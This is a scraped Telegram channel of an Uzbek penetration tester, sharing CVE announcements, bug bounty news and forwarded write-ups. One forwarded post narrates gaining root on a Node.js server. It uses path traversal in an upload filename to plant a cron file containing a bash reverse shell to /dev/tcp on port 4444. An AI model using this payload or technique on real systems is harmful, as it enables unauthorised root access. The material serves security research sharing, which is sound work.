SanSec
142 subscribers
74 photos
6 videos
16 files
75 links
Penetration Tester | BSCP | CMPen - Android | 9x CVE
Download Telegram
Jenkins 0day from Turan Security Team

https://www.cve.org/CVERecord?id=CVE-2026-19429
Forwarded from kamoloff.log
๐Ÿ˜Ž
Please open Telegram to view this post
VIEW IN TELEGRAM
Next CVEs

๐Ÿ”น CVE-2026-72607
๐Ÿ”น CVE-2026-72608
๐Ÿ”น CVE-2026-72609
๐Ÿ”น CVE-2026-72610


CNA sifatida yordam bergan @CNA_Uzbekistan va Jamshidga rahmat
๐Ÿ”ฅ2
Asadbek Fatullayev is cooking ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ

sansec.uz
๐Ÿ”ฅ10
Forwarded from Sploitus Agency
๐Ÿ™‚

shunaqa logikani kim o'ylab topgan ekana
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ˜3
Sploitus Agency
๐Ÿ™‚ shunaqa logikani kim o'ylab topgan ekana
401 unauthorized lekin swagger kevoti ๐Ÿ˜‚
๐Ÿ˜4๐Ÿคฃ3
Forwarded from JavaSec
Node.js. Webshell befoyda. Lekin...๐Ÿ‘€

Path traversal orqali RCE olish haqida eshitganmisiz?

Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa โ€” stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda to'xaydi va keyingisiga o'tadi. Lekin men filename parametriga e'tibor berdim.

Odatda bu parametr serverda fayl nomini belgilaydi. Sanitize qilinmagan bo'lsa โ€” path traversal. Tekshirdim:
filename=../../../../../../etc/passwd

Server 200 OK javob qaytardi. Xato yo'q.

Endi asosiy savol โ€” process qaysi user bilan ishlayapti? Agar www-data bo'lsa /etc ga yoza olmayman. Root bo'lsa โ€” boshqa gap.
filename=../../../../../../etc/cron.d/backdoor

file body'ga esa:
* * * * * root bash -i >& /dev/tcp/x.x.x.x/4444 0>&1

Server 200 OK. Yuklandi. Endi faqat cron daemon ishlayaptimi degan savol qoldi โ€” va u ishlayotgandi.

Netcat'ni yoqib 60 soniya kutdim.
connect to [attacker] from [target]
uid=0(root) gid=0(root) groups=0(root)

CVE kerak emas. 0day kerak emas. Webshell ham kerak emas.

Faqat sanitize qilinmagan bitta parametr va root sifatida ishlaydigan bitta process. Asosiy muammo kod ichida emas โ€” uni kim yozganida edi.๐Ÿ™‚

Telegram๐Ÿ“ฑ Linkedin ๐Ÿ“ฑ Webโœˆ๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4
New BBP targets are coming soon

SanSec.uz
๐Ÿ”ฅ2
$150,000 Apple Bug Bounty ๐ŸŽ

[CVE-2026-20685] Beyond Prompt Injection: Hacking Apple's Private Cloud Compute ๐Ÿคฏ๐Ÿ”ฅ

๐Ÿ”— https://blog.sentry.security/beyond-prompt-injection-hacking-apples-private-cloud-compute/
๐Ÿ”— https://nvd.nist.gov/vuln/detail/CVE-2026-20685
๐Ÿ”ฅ8
New target in sansec.uz ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ
๐Ÿ”ฅ4
Forwarded from aYub Cyber
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ5๐Ÿ‘2๐Ÿค2
aYub Cyber
Huddi shu logika bazi katta bank dasturlari, fintech applarda ham ishlaydi. Balki siz hozir ham ishlatayotgan bo'lishingiz mumkin.
**** ilovasida yangi qurulmadan kirilganda - passport malumotlardan kiritmasdan barcha amaliyotlarni bajarish imkoniyatini berar edi (fix qilingan). Bu hakerga sizning akkauntingizga yangi qurulmadan buzib kirganda moliyaviy amaliyotlar bajarish imkonini beradi!
๐Ÿ”ฅ3๐Ÿ‘2
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ”ฅ8โšก2๐Ÿ‘1
โ€ข Mana shuuuuncha ko'p yangi targetlar topdim, sansec.uz uchun.

Degan rasm
๐Ÿ”ฅ5
@saidakbarxon_m bro is cooking.

Negadur OAuth ga ko'pchilik e'tibor qaratmayapti
๐Ÿ”ฅ9
Instagram premium ads ๐Ÿฅ€๐Ÿฅ€๐Ÿฅ€
๐Ÿคฃ8๐ŸŒญ1๐ŸŒ1
Forwarded from FR3NZY
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ1